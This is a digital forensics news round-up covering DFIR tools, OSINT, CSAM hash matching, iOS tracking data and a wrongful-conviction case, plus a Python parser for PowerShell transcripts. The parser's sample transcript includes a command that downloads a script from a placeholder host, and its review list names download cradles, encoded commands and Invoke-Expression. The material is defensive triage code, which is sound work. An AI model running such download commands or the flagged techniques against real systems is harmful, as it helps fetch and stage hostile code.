A round-up of this week’s digital forensics news and views:
SANS DFIR Summit 2025 Playlist Released
SANS has released a comprehensive playlist from the DFIR Summit 2025 featuring cutting-edge digital forensics and incident response strategies. Content covers AI-driven workflows, covert command and control systems, cloud compromise scenarios, and macOS forensics techniques. The playlist provides real-world insights and practical strategies for cybersecurity professionals and digital defenders.
UAC v3.2.0 Released with New Features and Bug Fixes
Unix-like Artifacts Collector (UAC) v3.2.0 has been released with new features, additional artifacts, and bug fixes. UAC is an incident response tool designed for forensic investigators, security analysts, and IT professionals that automates artifact collection from Unix-like systems including AIX, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris. The tool simplifies data collection for intrusion handling, forensic investigations, and compliance checks while reducing dependence on external support during critical incidents.
Coalition of Cyber Investigators Co-Founder Discusses OSINT Professionalization and Investment Fraud
Neal Ysart, co-founder of The Coalition of Cyber Investigators, discusses his organization’s mission to professionalize OSINT practices and combat investment fraud. Ysart and partner Paul Wright established the coalition as a think-tank combining 80+ years of experience in law enforcement, forensics, and intelligence operations. He emphasizes the need for standardized methodologies and warns against “OSINT cowboys” who compromise evidential integrity, while highlighting the coalition’s specialized work in investigating increasingly sophisticated boiler room investment scams.
Part 2 of 3: Running A Digital Forensic Business
Digital forensics expert Patrick Siewert outlines key strategies for operating a successful digital forensic professional services business. Marketing emerges as the single biggest budget item after software licenses, requiring targeted approaches to reach litigators rather than general attorneys or government entities. Siewert emphasizes the importance of proper pricing, networking within professional organizations, and building a strong personal brand through principled practice. He warns against underpricing services and advises setting aside 30% of revenue for taxes while maintaining commitment to long-term business growth.
Read more (dfirphilosophy.blogspot.com)
NCMEC Hash Value Integration Accelerates Child Exploitation Investigations
Cellebrite announces integration of the National Center for Missing and Exploited Children’s hash value list into its digital forensics software, allowing investigators to instantly identify known child sexual abuse material during device examinations. The integration significantly reduces investigation time by automatically flagging CSAM files from NCMEC’s database of approximately 10 million hashed files, while providing mental health protection for law enforcement by allowing them to redact explicit content. Despite receiving over 22 million CyberTipline reports in 2024, NCMEC warns that numbers have actually decreased due to reduced reporting from some platforms and increased use of end-to-end encryption.
PowerShell Transcripts: Essential Digital Forensics Tool for Incident Response
PowerShell transcripts function as “flight data recorders” for PowerShell activity, capturing both user commands and system outputs in plain-text logs. Eric Capuano explains how these transcripts can be enabled enterprise-wide through Group Policy or Intune, providing investigators with detailed session records including usernames, timestamps, host applications, and process IDs. Security teams can leverage transcripts alongside Script Block Logging to detect malicious activity, though the logs can be tampered with and should be written to a write-only network share for maximum effectiveness.
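The session records described above, as an added example that is not from the original round-up or from Eric Capuano’s post: a small Python parser that pulls the session metadata (username, start and end timestamps, host application, process ID) out of a transcript header, collects the commands typed at the prompt, and checks that the end block is present, since a transcript with no footer may belong to a session that was killed or to a file that was truncated or edited. The sample transcript is constructed for this example; the header field names follow the layout PowerShell’s transcription feature writes, but the user, host, command lines and the review patterns are assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional

# Constructed sample transcript (not a real capture). The header keys match the
# fields PowerShell transcription emits; every value below is invented.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20250815093012
Username: CORP\jdoe
RunAs User: CORP\jdoe
Configuration Name:
Machine: WKS-042 (Microsoft Windows NT 10.0.19045.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile
Process ID: 4312
PSVersion: 5.1.19041.4894
**********************
PS C:\Users\jdoe> Get-ChildItem C:\Temp

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         8/15/2025   9:29 AM            512 notes.txt

PS C:\Users\jdoe> Invoke-WebRequest http://example.invalid/a.ps1 -OutFile C:\Temp\a.ps1
**********************
Windows PowerShell transcript end
End time: 20250815093155
**********************
"""

# Header keys worth keeping, mapped to attribute names on TranscriptSession.
FIELD_MAP = {
    "Start time": "start_time",
    "End time": "end_time",
    "Username": "username",
    "RunAs User": "runas_user",
    "Machine": "machine",
    "Host Application": "host_application",
    "Process ID": "process_id",
    "PSVersion": "ps_version",
}

HEADER_LINE = re.compile(r"^(?P<key>[^:]+):\s?(?P<value>.*)$")
PROMPT_LINE = re.compile(r"^PS (?P<cwd>.*?)> ?(?P<cmd>.*)$")

# Illustrative triage patterns (assumed, not a tuned detection rule): download
# cradles, encoded commands and inline evaluation are common things an analyst
# wants to read first when reviewing a transcript.
REVIEW_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"-EncodedCommand\b", r"-enc\b", r"FromBase64String", r"DownloadString",
        r"Invoke-WebRequest\b", r"\biwr\b", r"Invoke-Expression\b", r"\biex\b",
    )
]


@dataclass
class TranscriptSession:
    username: str = ""
    runas_user: str = ""
    machine: str = ""
    host_application: str = ""
    process_id: Optional[int] = None
    ps_version: str = ""
    start_time: Optional[datetime] = None
    end_time: Optional[datetime] = None
    commands: List[str] = field(default_factory=list)

    def is_complete(self) -> bool:
        """True when both the start header and the end footer were parsed.
        A missing footer means the session was still running, was killed,
        or the file was truncated or edited after the fact."""
        return self.start_time is not None and self.end_time is not None


def _set_field(session: TranscriptSession, key: str, value: str) -> None:
    attr = FIELD_MAP[key]
    value = value.strip()
    if attr in ("start_time", "end_time"):
        # Transcript timestamps are written as yyyyMMddHHmmss in local time.
        setattr(session, attr, datetime.strptime(value, "%Y%m%d%H%M%S"))
    elif attr == "process_id":
        setattr(session, attr, int(value))
    else:
        setattr(session, attr, value)


def parse_transcript(text: str) -> TranscriptSession:
    """Parse one transcript file: header/footer blocks are delimited by lines of
    asterisks; everything else is prompt lines (commands) and command output."""
    session = TranscriptSession()
    in_block = False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped and set(stripped) == {"*"}:
            in_block = not in_block  # enter or leave a header/footer block
            continue
        if in_block:
            m = HEADER_LINE.match(stripped)
            if m and m.group("key") in FIELD_MAP:
                _set_field(session, m.group("key"), m.group("value"))
            continue
        m = PROMPT_LINE.match(line)
        if m and m.group("cmd").strip():
            session.commands.append(m.group("cmd").strip())
    return session


def flag_commands(session: TranscriptSession) -> List[str]:
    """Commands matching the illustrative review patterns, in transcript order."""
    return [c for c in session.commands if any(p.search(c) for p in REVIEW_PATTERNS)]


if __name__ == "__main__":
    s = parse_transcript(SAMPLE_TRANSCRIPT)
    print(f"{s.username} on {s.machine} pid={s.process_id} host={s.host_application}")
    print(f"start={s.start_time} end={s.end_time} complete={s.is_complete()}")
    for cmd in flag_commands(s):
        print("review:", cmd)
```

Running the block against the constructed sample prints the user, machine, process ID and host application from the header, reports the session as complete, and lists only the download command for review. Pointing `parse_transcript` at files collected from a write-only share gives the same per-session view across a fleet; the completeness check is the cheap first filter for transcripts that were cut short.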
iOS Search Party Database Reveals Detailed Device Tracking Data
Forensic researcher Binary Hick discovers that iOS devices maintain comprehensive records of all FindMy-compatible devices they encounter through an encrypted database called Observations.db. The database stores timestamps, precise location coordinates, signal strength, and MAC addresses of detected beacons, creating a detailed tracking log that updates frequently but deletes records rapidly. Binary Hick successfully decrypted the database using keys found in the iOS keychain and demonstrates how the data can help identify unwanted tracking devices like AirTags.
Read more (thebinaryhick.blog)
NJIT Forensics Team Uses Cell Data to Free Wrongly Imprisoned Man
Ray Wooden spent over a year in a Pennsylvania jail for a crime he didn’t commit before three NJIT forensic science students and graduates helped clear his name using cellphone location data. Wooden was falsely accused of firing shots at a Philadelphia home in what he described as retaliation for tipping off police about a woman involved in a home invasion. Mia LoRé, Carmen Cheung and Gillian Kongnyuy analyzed Wooden’s phone records and device data, conclusively showing his phone was never near the residence during the reported shootings and confirming he had possession of his device throughout. Philadelphia prosecutors dismissed all charges in July after the digital evidence proved Wooden’s innocence.